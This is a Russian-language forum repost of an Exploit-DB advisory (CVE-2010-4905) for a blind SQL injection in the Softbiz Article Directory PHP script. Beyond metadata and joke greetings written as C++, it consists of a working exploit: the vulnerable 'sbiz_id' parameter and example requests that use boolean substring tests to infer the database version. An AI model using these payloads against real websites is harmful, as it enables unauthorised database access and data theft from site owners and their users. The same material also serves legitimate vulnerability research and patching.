Exploit Softbiz Article Directory Script - 'sbiz_id' Blind SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14910
Проверка EDB
  1. Пройдено
Автор
H4CK3R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2010-4905
Дата публикации
2010-09-05
Код:
===========================================================
[~] Title: Article Directory (sbiz_id) Blind SQL Injection Vuln
[~] Script: Article Directory
[~] Price: $65
[~] Link: http://www.softbizscripts.com/article-management-script.php
===========================================================
[~] Author: BorN To K!LL - h4ck3r
[~] Contact: [email protected]
===========================================================
[~] 3xploit:
/article_details.php?sbiz_id=[Blind-Injection]

[~] Example:
server/article_details.php?sbiz_id=13 and substring(version(),1,1)=4    // False ,,
server/article_details.php?sbiz_id=13 and substring(version(),1,1)=5    // True ,,
===========================================================
[~] Greetings:
bool Greetings = True;
if (Greetings = True)
{
    cout<<"Dr.2"
          <<"Q8 H4x0r"
          <<"Dr.Faustus"
          <<"AsbMay's Group"
          <<"darkc0de team"
          <<"my wife.."
          <<"and all friends \n";
}
else
{
    cout<<"No greeting ..\n";
}
===========================================================
 
Источник
www.exploit-db.com

Похожие темы